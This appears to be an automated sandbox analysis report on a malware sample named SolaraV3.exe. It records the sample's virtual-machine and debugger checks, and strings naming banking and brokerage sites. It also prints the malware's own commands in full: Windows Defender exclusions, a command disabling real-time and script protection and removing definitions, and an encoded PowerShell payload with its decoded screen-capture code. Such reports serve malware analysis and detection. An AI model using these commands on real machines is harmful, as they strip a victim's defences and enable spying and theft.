Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwareservice
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmwareservicer5
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwareuser
Source: getmac.exe, 0000005B.00000003.1777433293.000002364087B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777616203.000002364089F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vboxserviceZ
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwaretray
Source: SolaraV3.exe, 00000002.00000003.1920657343.000001FC25646000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1770986223.000001FC2526D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2042793103.000001FC256C4000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1767469686.000001FC256C4000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1919694922.000001FC2612A000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1921057827.000001FC2526D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1770391926.000001FC25646000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2045845216.000001FC2611B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: SolaraV3.exe, 00000002.00000003.1769191684.000001FC2540D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2040009745.000001FC2540D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1579360087.000001FC25402000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vboxtray
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: rar.exe, 0000006E.00000003.1935668462.000001DD0C739000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: getmac.exe, 0000005B.00000003.1777433293.000002364087B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000002.1779208598.00000236408C1000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777587060.00000236408BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: getmac.exe, 0000005B.00000003.1777948057.00000236408A5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777433293.000002364087B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777616203.000002364089F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000002.1779115042.00000236408A6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAW
Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmwareuserZ
Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: qemu-gaZ
Source: getmac.exe, 0000005B.00000003.1777433293.000002364087B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000002.1779208598.00000236408C1000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777587060.00000236408BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmtoolsd
Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmwarec
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmwaretrayZ
Source: getmac.exe, 0000005B.00000003.1777433293.000002364087B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-Vf
Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmwareservicer5Z
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Potentially malicious time measurement code found

Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B815731		2_2_00007FFB0B815731
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B814246		2_2_00007FFB0B814246

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\SolaraV3.exe

Code function: 2_2_00007FFB0B815731 rdtsc

2_2_00007FFB0B815731

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\SolaraV3.exe

Code function: 1_2_00007FF6DC71A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

1_2_00007FF6DC71A614

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\SolaraV3.exe

Code function: 2_2_00007FFB0BB66EE0 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,

2_2_00007FFB0BB66EE0

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\SolaraV3.exe

Code function: 1_2_00007FF6DC723480 GetProcessHeap,

1_2_00007FF6DC723480

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC71A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00007FF6DC71A614
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC70D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00007FF6DC70D12C
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC70C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00007FF6DC70C8A0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC70D30C SetUnhandledExceptionFilter,	1_2_00007FF6DC70D30C
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC71A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00007FF6DC71A614
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC70D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00007FF6DC70D12C
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC70C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00007FF6DC70C8A0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC70D30C SetUnhandledExceptionFilter,	2_2_00007FF6DC70D30C
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B815A24 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00007FFB0B815A24
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0C3C0376 SetUnhandledExceptionFilter,	2_2_00007FFB0C3C0376
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EED4C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	110_2_00007FF74EED4C10
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EECB52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	110_2_00007FF74EECB52C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EECB6D8 SetUnhandledExceptionFilter,	110_2_00007FF74EECB6D8
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EECA66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	110_2_00007FF74EECA66C

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'

Bypasses PowerShell execution policy

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB

Encrypted powershell cmdline option found

Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}

Modifies Windows Defender protection settings

Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
